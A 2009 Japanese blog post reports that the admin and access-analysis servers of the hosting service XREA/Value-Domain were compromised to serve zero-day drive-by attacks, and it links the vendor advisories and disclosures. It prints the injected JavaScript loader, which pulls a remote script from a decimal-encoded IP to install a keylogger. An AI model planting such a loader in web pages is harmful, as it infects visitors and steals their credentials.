モーグルとカバとパウダーの日記

モーグルやカバ(EXカービング)山スキー(BC)などがメインの日記でした。今は仕事のコンピュータ系のネタが主になっています。以前はスパム対策関連が多かったのですが最近はディープラーニング関連が多めです。

デジロウイルス

pc security

XREAValue-Domainの「管理用サーバ」がクラックされていて、例えば管理用のログイン画面やアクセス解析の画面に、javascript経由でFlashAdobe Reader、あと7/7に発表されたゼロデイのActiveXの穴を利用して侵入するコードが埋められている。(7/8 18:00時点でも)
ちなみに現時点で、XREAValue-Domainどちらも、これらの報告はホームページ上にまだ上がっていない。


バランサーで2ホストにわかれるのだが、片方だけが攻撃コードが埋め込まれているため、普通にアクセスすると攻撃コード有と無しの場合とどちらもありうる。
IPでアクセスすると、現時点でもまだ攻撃コードが有るページを見れる。


VALUE DOMAINってどうよ? part33
http://pc11.2ch.net/test/read.cgi/hosting/1246828727/547

547 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/07/08(水) 16:23:31 0
>>539
うわ、まじだ

>Name: ax.xrea.com
>Addresses: 219.101.229.188, 219.101.229.189
前者に不正コード確認、後者はなし

ttp : //219.101.229.188/login.php (現時点で不正コード注意)


攻撃コード部分のみ抜粋(リンクにならないようURL部分を一部変更)

<SCRIPT LANGUAGE="JAVASCRIPT">
    var js = document.createElement('script');
    js.src ="http : //1856317799:888/jp.js";
    try {document.getElementsByTagName('head')[0].appendChild(js);}
    catch(exp){}
    js = null;
</SCRIPT>


これに掛ると、キーロガーを入れられるとのことなんだけど、0x6EA52967:888/dir2/show.phpwgetしてこれなかったので先は追えず。
仮想環境用意してそっから追わせないと拒否られるのかな?


1856317799でぐぐって、ちゃんと検証しているエントリーを探したところ、FFXI(仮)のエントリーが最も早く詳しく検証されていた。
攻撃側はアカハック系っぽいみたい。(だから非常に被害が広がっておかしくないのだけど、意外に小規模な被害で済む気がする)


FFXI(仮)  hellh.net
http://ilion.blog47.fc2.com/blog-entry-140.html


UnderForge of Lack » security
http://www3.atword.jp/gnome/category/security/


(追記)

この件で使われたゼロデイの攻撃手法をふさぐためのページ

マイクロソフト セキュリティ アドバイザリ (972890): Microsoft Video ActiveX コントロール脆弱性により、リモートでコードが実行される
http://www.microsoft.com/japan/technet/security/advisory/972890.mspx


(追記)

大手で自社で感染を確認した記事がやっと出てきた。
未だ感染ページが修正されていない点で、もっと騒がれておかしくないと思うんだけど、なぜこれしか話題になってないんだろう??

セキュリティ通信|セキュリティ関連ニュース 国内のサイト複数が改ざん〜早急にDirectShowの脆弱性回避策の適用を
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1946


(追記)

今になってやっと公式発表が出た。
感染後2週間たってやっと発表って… あと、ここではアクセス解析のほうに仕込まれてるものについては記述がないけど、あっちはどうなってるんだ??

お知らせ(20090721-1) - VALUE DOMAIN:バリュードメイン
http://www.value-domain.com/info.php?action=press&no=20090721-1


(追記)

Cookieさんから教えていただいて、アクセス解析のほうについても公式発表がされていたのを確認。

アクセス解析 [AccessAnalyzer.com]
http://ax.xrea.com/index.php?action=200907

○原因・経緯
サーバー、ソフトウェア共に、外部に構築依頼しておりましたが、昨年、同様
の問題(ホームページ編集用のパスワードが受託者以外に漏れていた問題)が
あった以後から、管理を引き継いでおりました。正直に申し上げますと、委託
契約を解除し、そのままシステムを引き継ぎましたが、1番目の解析用サーバー
は、昨年、自社管理のシステムに移して運用中でございましたが、2番目のサー
バーについては、直接の問題対象外であったということもあり、システム移行
作業を怠り、前システムのまま、つまり、類似の問題が解消されない状態で運
用されておりました。

…まあなんだ。嘘無しで正直に報告してあるんだと思うから、そこだけは良いと思う。
人いないんだろうなあ、という感想。



(関連情報)

リネージュ資料室 - ガイド >> セキュリティ対策 (ウィルス情報 - 感染源サイト)
http://lineage.paix.jp/guide/security/virus-site.html#VALUEDOMAIN

スラッシュドット・ジャパン - IEをターゲットにしたゼロデイ攻撃が発生中
http://slashdot.jp/firehose.pl?op=view&id=117594

セキュリティホール memo
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2009/07.html#20090706_DirectShow

Windowsにゼロデイの脆弱性、サイト改ざん攻撃が多発 - ITmedia エンタープライズ
http://www.itmedia.co.jp/enterprise/articles/0907/07/news015.html